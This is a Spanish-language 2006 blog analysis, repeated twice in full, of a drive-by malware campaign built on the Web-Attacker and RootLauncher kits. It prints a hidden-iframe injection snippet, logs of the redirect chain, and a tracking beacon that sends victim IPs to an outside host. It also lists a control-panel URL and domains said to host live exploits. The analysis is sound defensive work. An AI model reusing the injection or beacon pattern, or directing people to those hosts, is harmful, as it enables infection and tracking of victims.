Troyano propagandose en las ultimas 24hs (Web-Attacker, RootLauncher)
Por Martin Aberastegue
http://www.rzw.com.ar
NOTA MUY IMPORTANTE: Antes que nada quiero aclarar que algunas de las URLs utilizadas por estos individuos aun siguen activas, asi que mucho cuidado al ingresar, no sea cosa que nos mate la curiosidad.
Acabo de ver la alerta de la Asociacion de Internautas (Esp.):
http://seguridad.internautas.org/html/1/928.html
Y me dio un poco de curiosidad, asi que me puse a ver que hacia este sitio en cuestion para infectar al usuario visitante.
Primero hay que aclarar que como bien dicen en AI el sitio intenta explota vulnerabilidades tanto en Internet Explorer como Firefox, alrededor de 8 en
total [1].
Para atraer a los usuarios hacia los sitios infectados han enviado un mensaje en el que se habla de un supuesto robo millonario en UK por el cual se ofrece una recomensa de USD 5 millones por cualquier dato que lleve a apresar los delincuentes, y en el mensaje se invita al usuario a que ingrese a un sitio determinado para ver las fotografias de los criminales.
http://seguridad.internautas.org/graficos/correotrampa8-10-06.jpg
Las URLs en el mensaje no estan ofuscadas se muestran tal cual.
http://police-news.net/
http://police-newsworld.com/
Al ingresar, el usuario es redirijido hacia el siguiente dominio:
http://inthost7.com/
Dicho sitio nos muestra una pagina con una noticia relacionada a conflictos de US e Iran, pero nada relacionado a la recompensa de los 5 millones, lo cual hara que el usuario decida cerrar la ventana, pero sera demasiado tarde, porque al cargar la pagina, sin saberlo se llama a la siguiente URL utilizando un iframe oculto:
http://www.inthost7.com/counter.php
-----------------------------------------------------
[iframe src="*http://www.inthost7.com/counter.php*" width=5 height=5 style="display:none"][/iframe]
-----------------------------------------------------
El archivo counter.php nos ira redireccionando de un archivo a otro segun el navegador y el sistema operativo que poseamos:
cmd > GET /counter.php HTTP/1.0
cmd > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd > User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)
cmd > Host: www.inthost7.com
cmd > Pragma: no-cache
cmd >
cmd > GET */cgi-bin/counter.cgi?homepage* HTTP/1.0
cmd > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd > User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)
cmd > Host: www.inthost7.com
cmd > Pragma: no-cache
cmd >
cmd > GET */demo.php* HTTP/1.0
cmd > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd > User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)
cmd > Host: www.inthost7.com
cmd > Pragma: no-cache
cmd >
text/html => counter.php
Document = counter.php
RequestDone Error = 0
StatusCode = 200
hdr>HTTP/1.0 302 Found
hdr>Date: Mon, 09 Oct 2006 07:07:29 GMT
hdr>Content-Type: text/html
hdr>Server: Apache/1.3.34 (Unix) mod_ssl/2.8.25 OpenSSL/0.9.7f PHP/4.4.2
mod_perl/1.29 FrontPage/5.0.2.2510
hdr>X-Powered-By: PHP/4.4.2
hdr>*Location: http://www.inthost7.com/cgi-bin/counter.cgi?homepage*
hdr>HTTP/1.0 *302 Moved*
hdr>Date: Mon, 09 Oct 2006 07:07:30 GMT
hdr>Content-Type: text/plain
hdr>Server: Apache/1.3.34 (Unix) mod_ssl/2.8.25 OpenSSL/0.9.7f PHP/4.4.2
mod_perl/1.29 FrontPage/5.0.2.2510
hdr>Location: *http://www.inthost7.com/demo.php*
hdr>HTTP/1.0 200 OK
hdr>Date: Mon, 09 Oct 2006 07:07:30 GMT
hdr>Content-Type: text/html
hdr>Server: Apache/1.3.34 (Unix) mod_ssl/2.8.25 OpenSSL/0.9.7f PHP/4.4.2
mod_perl/1.29 FrontPage/5.0.2.2510
hdr>X-Powered-By: PHP/4.4.2
Todo esto nos llevara a una pagina la cual posee un javascript con cierto codigo codificado que se encargara de edintificar el sistema operativo, navegador utilizado, version y redirigir al exploit correspondiente.
Se fija que sistema operativo tiene el usuario, y en caso de ser Windows XP, busca en la lista de parches si esta instalado el SP2, en el caso de existir pone una bandera en 1(XP_SP2_patched=1)
que luego comprobara para elegir asi que exploit ejecutar. (En realidad no se ejecuta en ese momento, sino que envia estos datos a un cgi que luego si redireccionaran hacia el troyano)
Si tenemos el SP2 tratara de ejecutar el exploit MS06-XMLNS
(HTML/EXPLOIT.VMLFILL) [3].
En uno de los exploits mas precisamente el que explota una falla en la VM de MS (MS03-011), se puede ver el siguiente codigo en una de las clases:
public String Get_Copyright() {
String string = "inet-lux team 24.05.2006";
return string;
}
Por lo que supongo que los sistemas utilizados en este caso son Web-Attacker y su compañerito RootLauncher.
Segun inet-lux team sus productos no son detectados por los siguiente antivirus:
Doctor Web 4.33
NOD32 Antivirus 2.5
McAfee VirusScan 10.0.27
Norton Antivirus 2006 (13.04.2006)
Kaspersky Antivirus 5.0.391 (14.04.2006)
Panda Titanium Antivirus 2005 (11.04.2006)
Aunque seguramente estos datos sean para despistar y al cliente se le ofresca un codigo "optimizado" que pase por encima de definiciones mas actuales o tenga un comportamiento menos sospechoso.
El sistema guarda ciertos datos para hacer un seguimiento de los equipos infectados/atacados, y lo hace enviando los siguientes datos a un dominio
que actualmente devuelve una pagina en blanco:
http://substance-of-way.com/estats/count_php.php?q2=XXX.XXX.XXX.XXX&q3=XXX-XXX-XXX-XXX.isp.com&q4=Mozilla/4.0(compatible;
MSIE 5.0; Windows 95; DigExt)&q5=/&q6=http://police-news.net/&q7=inthost7.com
Las datos enviados son los siguientes:
q2 = IP
q3 = Host
q4 = Navegador
q5 = Pagina solicitada (Ej: /index.html)
q6 = Dominio del cual proviene la victima
q7 = Dominio que esta ejecutando el exploit
--------------------
Dentro del mismo dominio se encuentra el panel de control de RootLauncher:
http://www.inthost7.com/cgi-bin/rleadmin.cgi (alguien sabe el password? XD)
Una vez infectados el troyano acude a dicha URL en busca de instrucciones, como aplicaciones a descargar, actualizaciones, comandos a ejecutar en general, etc.
--------------------
Sin hacemos una consulta de reverse-ip para el dominio inthost7.com o su IP nos encontraremos con estos dominios en el mismo servidor, algunos inactivos (todavia) y otros ya poseen los exploits alojados y en funcionamiento.
allsocks.info
bytecode.biz
drabland.net
fullcash.info
insorg.net
insorg.org
inthost7.com
kaligula.info
my-traff.net
planet69.org
pornoportals.info
russianerofoto.com
securitycash.info
sharedtraff.info
soccer-2006germany.com
spywarenuker.biz
x-reklamka.com
Estas URLs:
http://fullcash.info
http://spywarenuker.biz
Redireccionan hacia:
http://securitycash.info/
¿Les resulta familiar este diseño?
http://x-reklamka.com/
Yo lo veo muy parecido al de inet-lux team:
http://www.inet-lux.com, los que venden Web-Attacker y RootLauncher.
Casualidad quizas...
Este dominio tiene contenido pornografico, pero el mismo ha sido extraido de otro sitio, vaya uno a saber con que fin.
http://russianerofoto.com/
El siguiente dominio es un tanto interesante tambien, esta en ruso y una vez que nos registramos, accedemos a un panel en el cual podemos distribuir cierto archivo, X cantidad de veces y a los usuarios del pais que elijamos:
http://www.my-traff.net
Obviamente no es gratis, el pago del servicio puede realizarse via webmoney.ru, plataforma de pagos online muy utilizada por rusos (spammers y demas) en estos dias. De todas formas el usuario de destino "Z************" no existe mas, asi que debemos suponer que el sistema ya no esta operativo o lo estara en un futuro no muy lejano.
Bueno, fue suficiente por hoy, son las 5 am y tengo que dormir en algun momento :)
Espero que le sea de interes a alguien.
------------------------------------------------
*Enlaces Relacionados*:
- [1]:
Microsoft Security Bulletin MS06-014
Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx
Microsoft Security Bulletin MS03-011
Flaw in Microsoft VM Could Enable System Compromise (816093)
http://www.microsoft.com/technet/security/bulletin/ms03-011.mspx
Microsoft Internet Explorer JavaScript Window() Vulnerability:
Microsoft Security Bulletin MS05-054
Cumulative Security Update for Internet Explorer (905915)
http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx
Microsoft Security Bulletin MS06-006
Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet
Browsers Could Allow Remote Code Execution (911564)
http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx
Mozilla Foundation Security Advisory 2005-50
Exploitable crash in InstallVersion.compareTo (Firefox, Mozilla Suite)
http://www.mozilla.org/security/announce/2005/mfsa2005-50.html
Microsoft Security Advisory (917077)
Vulnerability in the way HTML Objects Handle Unexpected Method Calls Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/917077.mspx
Microsoft Security Bulletin MS06-006
Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx
IE ms-its: and mk:@MSITStore: vulnerability:
Microsoft Security Bulletin MS04-013
Cumulative Security Update for Outlook Express (837009)
http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx
- [2]:
http://www.enciclopediavirus.com/virus/vervirus.php?id=3456
Fuente: http://www.rzw.com.ar
___
http://www.rzw.com.ar
NOTA MUY IMPORTANTE: Antes que nada quiero aclarar que algunas de las URLs utilizadas por estos individuos aun siguen activas, asi que mucho cuidado al ingresar, no sea cosa que nos mate la curiosidad.
Acabo de ver la alerta de la Asociacion de Internautas (Esp.):
http://seguridad.internautas.org/html/1/928.html
Y me dio un poco de curiosidad, asi que me puse a ver que hacia este sitio en cuestion para infectar al usuario visitante.
Primero hay que aclarar que como bien dicen en AI el sitio intenta explota vulnerabilidades tanto en Internet Explorer como Firefox, alrededor de 8 en
total [1].
Para atraer a los usuarios hacia los sitios infectados han enviado un mensaje en el que se habla de un supuesto robo millonario en UK por el cual se ofrece una recomensa de USD 5 millones por cualquier dato que lleve a apresar los delincuentes, y en el mensaje se invita al usuario a que ingrese a un sitio determinado para ver las fotografias de los criminales.
http://seguridad.internautas.org/graficos/correotrampa8-10-06.jpg
Las URLs en el mensaje no estan ofuscadas se muestran tal cual.
http://police-news.net/
http://police-newsworld.com/
Al ingresar, el usuario es redirijido hacia el siguiente dominio:
http://inthost7.com/
Dicho sitio nos muestra una pagina con una noticia relacionada a conflictos de US e Iran, pero nada relacionado a la recompensa de los 5 millones, lo cual hara que el usuario decida cerrar la ventana, pero sera demasiado tarde, porque al cargar la pagina, sin saberlo se llama a la siguiente URL utilizando un iframe oculto:
http://www.inthost7.com/counter.php
-----------------------------------------------------
[iframe src="*http://www.inthost7.com/counter.php*" width=5 height=5 style="display:none"][/iframe]
-----------------------------------------------------
El archivo counter.php nos ira redireccionando de un archivo a otro segun el navegador y el sistema operativo que poseamos:
cmd > GET /counter.php HTTP/1.0
cmd > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd > User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)
cmd > Host: www.inthost7.com
cmd > Pragma: no-cache
cmd >
cmd > GET */cgi-bin/counter.cgi?homepage* HTTP/1.0
cmd > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd > User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)
cmd > Host: www.inthost7.com
cmd > Pragma: no-cache
cmd >
cmd > GET */demo.php* HTTP/1.0
cmd > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd > User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)
cmd > Host: www.inthost7.com
cmd > Pragma: no-cache
cmd >
text/html => counter.php
Document = counter.php
RequestDone Error = 0
StatusCode = 200
hdr>HTTP/1.0 302 Found
hdr>Date: Mon, 09 Oct 2006 07:07:29 GMT
hdr>Content-Type: text/html
hdr>Server: Apache/1.3.34 (Unix) mod_ssl/2.8.25 OpenSSL/0.9.7f PHP/4.4.2
mod_perl/1.29 FrontPage/5.0.2.2510
hdr>X-Powered-By: PHP/4.4.2
hdr>*Location: http://www.inthost7.com/cgi-bin/counter.cgi?homepage*
hdr>HTTP/1.0 *302 Moved*
hdr>Date: Mon, 09 Oct 2006 07:07:30 GMT
hdr>Content-Type: text/plain
hdr>Server: Apache/1.3.34 (Unix) mod_ssl/2.8.25 OpenSSL/0.9.7f PHP/4.4.2
mod_perl/1.29 FrontPage/5.0.2.2510
hdr>Location: *http://www.inthost7.com/demo.php*
hdr>HTTP/1.0 200 OK
hdr>Date: Mon, 09 Oct 2006 07:07:30 GMT
hdr>Content-Type: text/html
hdr>Server: Apache/1.3.34 (Unix) mod_ssl/2.8.25 OpenSSL/0.9.7f PHP/4.4.2
mod_perl/1.29 FrontPage/5.0.2.2510
hdr>X-Powered-By: PHP/4.4.2
Todo esto nos llevara a una pagina la cual posee un javascript con cierto codigo codificado que se encargara de edintificar el sistema operativo, navegador utilizado, version y redirigir al exploit correspondiente.
Se fija que sistema operativo tiene el usuario, y en caso de ser Windows XP, busca en la lista de parches si esta instalado el SP2, en el caso de existir pone una bandera en 1(XP_SP2_patched=1)
que luego comprobara para elegir asi que exploit ejecutar. (En realidad no se ejecuta en ese momento, sino que envia estos datos a un cgi que luego si redireccionaran hacia el troyano)
Si tenemos el SP2 tratara de ejecutar el exploit MS06-XMLNS
(HTML/EXPLOIT.VMLFILL) [3].
En uno de los exploits mas precisamente el que explota una falla en la VM de MS (MS03-011), se puede ver el siguiente codigo en una de las clases:
public String Get_Copyright() {
String string = "inet-lux team 24.05.2006";
return string;
}
Por lo que supongo que los sistemas utilizados en este caso son Web-Attacker y su compañerito RootLauncher.
Segun inet-lux team sus productos no son detectados por los siguiente antivirus:
Doctor Web 4.33
NOD32 Antivirus 2.5
McAfee VirusScan 10.0.27
Norton Antivirus 2006 (13.04.2006)
Kaspersky Antivirus 5.0.391 (14.04.2006)
Panda Titanium Antivirus 2005 (11.04.2006)
Aunque seguramente estos datos sean para despistar y al cliente se le ofresca un codigo "optimizado" que pase por encima de definiciones mas actuales o tenga un comportamiento menos sospechoso.
El sistema guarda ciertos datos para hacer un seguimiento de los equipos infectados/atacados, y lo hace enviando los siguientes datos a un dominio
que actualmente devuelve una pagina en blanco:
http://substance-of-way.com/estats/count_php.php?q2=XXX.XXX.XXX.XXX&q3=XXX-XXX-XXX-XXX.isp.com&q4=Mozilla/4.0(compatible;
MSIE 5.0; Windows 95; DigExt)&q5=/&q6=http://police-news.net/&q7=inthost7.com
Las datos enviados son los siguientes:
q2 = IP
q3 = Host
q4 = Navegador
q5 = Pagina solicitada (Ej: /index.html)
q6 = Dominio del cual proviene la victima
q7 = Dominio que esta ejecutando el exploit
--------------------
Dentro del mismo dominio se encuentra el panel de control de RootLauncher:
http://www.inthost7.com/cgi-bin/rleadmin.cgi (alguien sabe el password? XD)
Una vez infectados el troyano acude a dicha URL en busca de instrucciones, como aplicaciones a descargar, actualizaciones, comandos a ejecutar en general, etc.
--------------------
Sin hacemos una consulta de reverse-ip para el dominio inthost7.com o su IP nos encontraremos con estos dominios en el mismo servidor, algunos inactivos (todavia) y otros ya poseen los exploits alojados y en funcionamiento.
allsocks.info
bytecode.biz
drabland.net
fullcash.info
insorg.net
insorg.org
inthost7.com
kaligula.info
my-traff.net
planet69.org
pornoportals.info
russianerofoto.com
securitycash.info
sharedtraff.info
soccer-2006germany.com
spywarenuker.biz
x-reklamka.com
Estas URLs:
http://fullcash.info
http://spywarenuker.biz
Redireccionan hacia:
http://securitycash.info/
¿Les resulta familiar este diseño?
http://x-reklamka.com/
Yo lo veo muy parecido al de inet-lux team:
http://www.inet-lux.com, los que venden Web-Attacker y RootLauncher.
Casualidad quizas...
Este dominio tiene contenido pornografico, pero el mismo ha sido extraido de otro sitio, vaya uno a saber con que fin.
http://russianerofoto.com/
El siguiente dominio es un tanto interesante tambien, esta en ruso y una vez que nos registramos, accedemos a un panel en el cual podemos distribuir cierto archivo, X cantidad de veces y a los usuarios del pais que elijamos:
http://www.my-traff.net
Obviamente no es gratis, el pago del servicio puede realizarse via webmoney.ru, plataforma de pagos online muy utilizada por rusos (spammers y demas) en estos dias. De todas formas el usuario de destino "Z************" no existe mas, asi que debemos suponer que el sistema ya no esta operativo o lo estara en un futuro no muy lejano.
Bueno, fue suficiente por hoy, son las 5 am y tengo que dormir en algun momento :)
Espero que le sea de interes a alguien.
------------------------------------------------
*Enlaces Relacionados*:
- [1]:
Microsoft Security Bulletin MS06-014
Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx
Microsoft Security Bulletin MS03-011
Flaw in Microsoft VM Could Enable System Compromise (816093)
http://www.microsoft.com/technet/security/bulletin/ms03-011.mspx
Microsoft Internet Explorer JavaScript Window() Vulnerability:
Microsoft Security Bulletin MS05-054
Cumulative Security Update for Internet Explorer (905915)
http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx
Microsoft Security Bulletin MS06-006
Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet
Browsers Could Allow Remote Code Execution (911564)
http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx
Mozilla Foundation Security Advisory 2005-50
Exploitable crash in InstallVersion.compareTo (Firefox, Mozilla Suite)
http://www.mozilla.org/security/announce/2005/mfsa2005-50.html
Microsoft Security Advisory (917077)
Vulnerability in the way HTML Objects Handle Unexpected Method Calls Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/917077.mspx
Microsoft Security Bulletin MS06-006
Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx
IE ms-its: and mk:@MSITStore: vulnerability:
Microsoft Security Bulletin MS04-013
Cumulative Security Update for Outlook Express (837009)
http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx
- [2]:
http://www.enciclopediavirus.com/virus/vervirus.php?id=3456
Fuente: http://www.rzw.com.ar
___
0 Comments:
Publicar un comentario
Gracias por dejar un comentario en Segu-Info.
Gracias por comentar!